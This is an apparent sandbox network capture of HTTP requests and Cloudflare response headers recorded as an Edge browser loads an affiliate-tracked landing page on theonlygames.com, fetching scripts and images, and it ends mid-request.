user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: text/css
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: W/"5f5657da-211c"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
cf-request-id: 09df32e31100004c5ca2354000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WycqZaA66CzJ2WXoVafP8qUzc%2F5hV0FCw9U8S%2F3q04Mbr8VOZYbx35Kv%2B3H25C5399wK3CAP8olC%2B6fB2n5JxIsbgfZqHjpoEDdyK8XmoGAw"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7e8b154c5c-AMS
content-encoding: br
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/libs/jquery.min.js

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/libs/jquery.min.js HTTP/2.0
host: theonlygames.com
accept: application/javascript, */*;q=0.8
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: application/javascript
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: W/"5f5657da-1538f"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
cf-request-id: 09df32e31600004c5c27062000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=URUYoDBi6GPyraZN2RW3%2FNt4kYpuUePgsqT0RNgEFD1fdbMNo5OtpLhSJCZxV4C14BLchvh8%2B9UkRUQ8%2BAhYl8VUC4iX%2FifVcVDPhgtnGCsX"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7e8b1b4c5c-AMS
content-encoding: br
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/awpx_click.js?v=005

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /awpx_click.js?v=005 HTTP/2.0
host: theonlygames.com
accept: application/javascript, */*;q=0.8
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 70293
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-11295"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e36000004c5c2aac7000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DPNbgoEz00BVsW8FiMmVuK7gVfRphnh6%2BFJnOnYzRHwE%2BkmT77QSHnhAWRngdJmKSLHXIF%2FEF71ju1v12arAjk7TTY9yi2OhGgWZjYE8qVMd"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7efd674c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/nav.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/nav.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 4279
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-10b7"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4740
accept-ranges: bytes
cf-request-id: 09df32e35e00004c5ca92dc000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=srWc6U6484Zw72l%2BnFgIrYchEnNCmc7lTCWhPj0F7yLQ7bL4JwvIeyN2KDkcTVHi6Of9Gs7f2cq5DwKe5Rl6s2jUwVgkSqD2AfVuzpoN6UMt"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7efd664c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/notice.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/notice.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 26625
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-6801"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e36100004c5c6f0eb000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mSG7Xsg1INNcfMz%2BFWpZf4dy4%2BF3GZRNhA0vSrQzwod1%2FYVhbvt0qDw98Jl%2FxCdSal452XEPaxhWxGjT%2F4JiQXPwUvhlAnDXbhZOy46w%2FF%2FV"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7efd644c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/c1.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/c1.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: application/javascript
last-modified: Mon, 15 Mar 2021 11:04:16 GMT
etag: W/"604f3f30-5f6"
cache-control: max-age=14400
cf-cache-status: HIT
age: 5063
cf-request-id: 09df32e36000004c5c5aa24000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QXLiw2FT%2BvtnnzDxWrWmnzki606Wc9V08WGWOXXQMo3bvuGCWMtszPqnoJfNyIwgs3bfq5OMFpAvZdUe0A%2B02%2FJOUtCQVRfkhxIRbUQ28cVi"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7efd5e4c5c-AMS
content-encoding: br
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/c2.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/c2.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 4626
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-1212"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4793
accept-ranges: bytes
cf-request-id: 09df32e3b000004c5c27077000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zyXlBNhWOZdj%2F82NZ5Flaa%2Ben2ty9V1zm0EXt3IufE%2BvWSEFtljStDKzPoNMqOc%2Bqhc25w8PItxhql71ts3%2BKCbX6fyrZ0ct5fKlKDo1Nsdy"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ecd4c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/c3.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/c3.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 30079
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-757f"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4792
accept-ranges: bytes
cf-request-id: 09df32e3b100004c5ca92e7000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MTtxFanyn8sLxHcS0%2B%2BOTzMdS%2B2%2F5xtiky%2B7ZpB6iaoDvomHjbbSAdej8PZp8lLMj6J06%2F70GrPIlszrOmJmbKQaUOBisb5XSLxcMHxletDc"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ed74c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/logo.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/logo.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 72927
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-11cdf"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4793
accept-ranges: bytes
cf-request-id: 09df32e3b000004c5ca8239000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Fk653P57Zf%2FxdAtFyi3oC0GyUoZYa9hA3iXlxrbGW9%2Bsa9Bzn0hinEMcsJTEzFxrA%2BI2Uy%2FG8j6c5ATreoY%2BHM6lwsDo34P2O%2FR%2FoevcTQ2W"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ecb4c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/btn.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/btn.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 8545
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-2161"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b200004c5cad8e5000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1W8DbpWjPomzw6GAx30pnyfMS91E3tByeb%2BV9R%2Bp6mBAnTlNRLHaFAyEvFsfO3URgdqJuckuDTxoCroTAul1%2FlNI7yGuLH52wIKzRuL5Zd05"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ee04c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/arrow.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/arrow.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 64302
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-fb2e"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b500004c5c7c26a000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SCY%2FbLNfw%2FbJ795Kt9DCVos5%2Fvps7OcolDqYtXP%2F4GgeZ5m5BQ5j9f5bNOGCFERg9%2FAE5%2FfxpznOVjE0SB%2FonhRwJ%2FMEhG1hfuDY5KL1bjow"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ef24c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/notice2.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/notice2.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 57424
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-e050"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b500004c5c61005000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=0ukQsz3j1Uid8QK%2F08WUplYTpMGZnzxMJ3hbBEHWTN2qzKuhutFO6PxY35dCg2f6%2FDX60NkMV6Nkf%2FqhOuVZam0QmdBhVGnlTAG3smIFg2PU"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ef34c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/t1.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/t1.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 55482
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-d8ba"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b500004c5c3a08c000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DYB0SJsZtg1U5jH3MdjJI%2FI45rJlF4S3xrUL0AB7qI9HHC6Q70y9mdxo%2BiKvbjpeCyGw%2B311mfqxg4l5ekJWAuBys3LcoZUfr0GT1%2B6qnoRI"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ef64c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/t2.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/t2.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 7315
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-1c93"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b300004c5c84232000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=q%2BeinibwvISiPBNUx0ikqMfMVhsMDbjinFQitAOKv2ILAHA%2F4dFXxNYoRRMEOKWWI3xdMCRfa5Ca%2BNHRRrOjwJui8Yqyzw32zY5HR3aK1qbQ"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ee44c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/t3.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/t3.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 6695
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-1a27"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4792
accept-ranges: bytes
cf-request-id: 09df32e3b100004c5c86a20000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XwXiby%2BxHrhhhD8o5uYY6%2BSz5IN907cZ6uom0FMQBhqMXg7Edxxk4SvBd97o0z89yR5pWE%2B0bfexCosR1JGj4Ts0K0x3rRfWHtvTzqQznksi"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ed24c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/t4.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/t4.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __cfduid=d68b7f17f71d6bd532b37b5e943f457441620236159

Response

HTTP/2.0 200

date: Wed, 05 May 2021 17:35:59 GMT
content-type: image/png
content-length: 342
last-modified: Mon, 07 Sep 2020 15:55:06 GMT
etag: "5f5657da-156"
cache-control: max-age=14400
cf-cache-status: HIT
age: 4739
accept-ranges: bytes
cf-request-id: 09df32e3b500004c5c918da000000001
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
report-to: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9p77r2KH7ZXlwu3KlxJmVtawLHMgNKahqWOYk4nM93p7Q3Pfr%2BJ3rQP3amO5L%2Fn1%2BPmq%2FCRh9wgS06w8nhRh%2FWXj2R4OMeVpywxhNJA8o9A0"}],"group":"cf-nel"}
nel: {"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 64abba7f8ef74c5c-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/image/g2.png

MicrosoftEdgeCP.exe

Remote address:

104.21.24.48:443

Request

GET /common/tr/ce/land_ce_110720_2_en/image/g2.png HTTP/2.0
host: theonlygames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://theonlygames.com/common/tr/ce/land_ce_110720_2_en/?haff_pid=3&haff_oid=12&haff_cid=49400000448b6906&haff_sub1=pu_main&haff_sub2=14575867&haff_sub3=&haff_tag=rs&utm_source=hooligan
accept-language: en-US
